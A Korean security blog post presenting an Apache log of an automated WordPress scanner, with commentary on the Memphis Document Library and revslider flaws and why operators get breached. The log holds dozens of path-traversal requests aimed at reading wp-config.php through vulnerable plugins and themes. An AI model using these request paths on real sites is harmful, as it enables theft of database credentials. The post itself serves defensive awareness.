홈페이지 취약점 분석 이야기 | 파일 지도 사진 깨알 |
---|
>> 목록보이기 오늘의 공격로그: WordPress 전용 자동화공격도구 접속 기록오늘 워드프레스를 전문으로 공격하는 자동화 공격도구의 접속 기록이 아파치 로그에 남았다. 전체 중에서 WordPress 취약점 스캔 로그만 발췌했다. 193.201.224.205 - - [18/Jan/2017:04:58:47 +0900] "GET /blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1" 404 497 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:58:54 +0900] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/xxx.php HTTP/1.1" 404 531 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:00 +0900] "GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 493 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:06 +0900] "GET /index.php/mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1" 200 11329 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:09 +0900] "GET /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=../../../../wp-config.php HTTP/1.1" 200 11155 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:13 +0900] "GET /magmi/web/plugin_upload.php HTTP/1.1" 404 492 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:19 +0900] "GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1" 404 477 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:24 +0900] "GET /wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php HTTP/1.1" 404 498 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:30 +0900] "GET /wordpress/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php HTTP/1.1" 404 493 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:36 +0900] "GET /wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php HTTP/1.1" 404 488 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:41 +0900] "GET /wp-admin/admin-ajax.php?action=fe_get_sv_html&video=../wp-config.php HTTP/1.1" 404 488 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:46 +0900] "GET /wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php HTTP/1.1" 404 488 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:51 +0900] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php HTTP/1.1" 404 488 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:04:59:56 +0900] "GET /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1" 404 488 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:01 +0900] "GET /wp-admin/admin-ajax.php?action=populate_download_edit_form HTTP/1.1" 404 488 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:06 +0900] "GET /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 404 488 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:11 +0900] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 488 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:15 +0900] "GET /wp-admin/admin-ajax.php?action=showbiz_show_image&img=../wp-config.php HTTP/1.1" 404 488 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:19 +0900] "GET /wp-admin/admin.php?page=booking%2Fwpdev-booking.phpwpdev-booking&wh_approved&wh_is_new=1&wh_booking_date=3&view_mode=vm_listing HTTP/1.1" 404 483 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:24 +0900] "GET /wp-admin/blog/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 493 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:28 +0900] "GET /wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php HTTP/1.1" 404 483 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:32 +0900] "GET /wp-content/assets/themes/plugins/uploadify/uploadify.php HTTP/1.1" 404 521 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:36 +0900] "GET /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 404 575 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:40 +0900] "GET /wp-content/blog/secondaryphase/mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1" 404 508 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:44 +0900] "GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 494 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:47 +0900] "GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1" 404 506 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:50 +0900] "GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php HTTP/1.1" 404 510 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:53 +0900] "GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1" 404 527 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:56 +0900] "GET /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php HTTP/1.1" 404 519 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:00:59 +0900] "GET /wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php HTTP/1.1" 404 513 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:02 +0900] "GET /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php HTTP/1.1" 404 546 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:05 +0900] "GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1" 404 532 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:08 +0900] "GET /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download HTTP/1.1" 404 515 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:10 +0900] "GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1" 404 517 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:12 +0900] "GET /wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/.libs.php HTTP/1.1" 404 556 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:14 +0900] "GET /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 515 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:16 +0900] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 531 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:18 +0900] "GET /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 404 514 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:19 +0900] "POST /wp-content/themes/awake/lib/scripts/dl-skin.php HTTP/1.1" 404 512 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:22 +0900] "GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 404 513 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:23 +0900] "POST /wp-content/themes/construct/lib/scripts/dl-skin.php HTTP/1.1" 404 516 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:25 +0900] "POST /wp-content/themes/dejavu/lib/scripts/dl-skin.php HTTP/1.1" 404 513 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:26 +0900] "POST /wp-content/themes/echelon/lib/scripts/dl-skin.php HTTP/1.1" 404 514 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:27 +0900] "POST /wp-content/themes/elegance/lib/scripts/dl-skin.php HTTP/1.1" 404 515 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:29 +0900] "GET /wp-content/themes/epic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 404 509 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:29 +0900] "POST /wp-content/themes/fusion/lib/scripts/dl-skin.php HTTP/1.1" 404 513 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:30 +0900] "GET /wp-content/themes/infocus/lib/scripts/dl-skin.php HTTP/1.1" 404 514 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:31 +0900] "POST /wp-content/themes/infocus/lib/scripts/dl-skin.php HTTP/1.1" 404 514 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:32 +0900] "GET /wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 404 483 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:33 +0900] "POST /wp-content/themes/infocus2/lib/scripts/dl-skin.php HTTP/1.1" 404 515 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:34 +0900] "GET /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 404 514 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:34 +0900] "GET /wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 404 502 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:35 +0900] "POST /wp-content/themes/method/lib/scripts/dl-skin.php HTTP/1.1" 404 513 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:36 +0900] "POST /wp-content/themes/modular/lib/scripts/dl-skin.php HTTP/1.1" 404 514 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:37 +0900] "POST /wp-content/themes/myriad/lib/scripts/dl-skin.php HTTP/1.1" 404 513 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:37 +0900] "GET /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1" 404 541 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:38 +0900] "GET /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php HTTP/1.1" 404 545 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:39 +0900] "POST /wp-content/themes/persuasion/lib/scripts/dl-skin.php HTTP/1.1" 404 517 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:39 +0900] "GET /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 515 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0" 193.201.224.205 - - [18/Jan/2017:05:01:40 +0900] "GET /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 517 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
공격자의 IP주소는
이 접속은 워드프레스 플러그인 중 Memphis Document Library의 파일다운로드 취약점을 탐지하려는 시도이다.
이 접속은 2014년에 가장 큰 봇넷 구성에 성공했던 쏙쏙취약점을 탐지하려는 시도이다. 당시 revslider 플러그인의 취약점을 기반으로 - 알려진 것만 해도 - 10만 대 이상의 좀비서버를 양산하기도 했다.
자동화 공격도구는 항상 전세계를 훑고 있다.
수많은 보안 전문가들의 조언을 보면
등과 같다. 보안전문가들의 말은 모두 금과옥조처럼 맞는 말들이지만 해킹사고를 당해보지 않은 워드프레스 운영자들은 대부분 이러한 조언을 무시한다. 그리고 1년, 2년이 흐른 이후에는 거의 대부분 침해사고를 직접 경험하게 된다.
전 세계 누리집의 27%를 차지하는 워드프레스(WordPress)를 사용하는 것은 잠재적인 해킹 피해자라고 볼 수 있다.
병으로 따지면 잠복기 상태라고 보면 된다.
따라서 보안 전문가들의 조언을 따를 자신이 없다면, 그리고 자체적으로 개발할 여력이 없다면,
마무리: 누가, 왜 내 웹서버를 해킹하는가?
그리고 대부분의 침해사고에서 인간해커가 직접 해킹을 하는 비율은 너무너무너무 작다. 다만 농협사태, 한수원 침해사고 등과 같이 정치적인 목적이 있는 경우에만 인간해커들이 활동하는 것으로 보아도 무방하다. 물론 어느 인간해커가 지나가다가 우연히 내 웹서버의 취약점을 발견할 가능성도 있지만 확률은 매우 낮다. 웹핵누리집은 인터넷에 아직 알려지지 않은 상태임에도 불구하고 수많은 취약점 탐지 로그들이 발견된다(공격 로그 사례). 내 장비를 인터넷에 물리는 순간 항상 취약점 스캔이 발생한다는 점을 주지하는 것이 좋다. [처음 작성한 날: 2017.01.18] [마지막으로 고친 날: 2017.01.18] < 이전 글 : 오늘의 웹서버 공격 로그: phpMyAdmin 취약점 자동탐색 도구 - ZmEu Scanner (2017.01.21) > 다음 글 : WH-PathTrav-01 라이브 ISO: 파일 다운로드 취약점으로 서버 침투 (2017.01.16) 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다. 잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다. 문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 |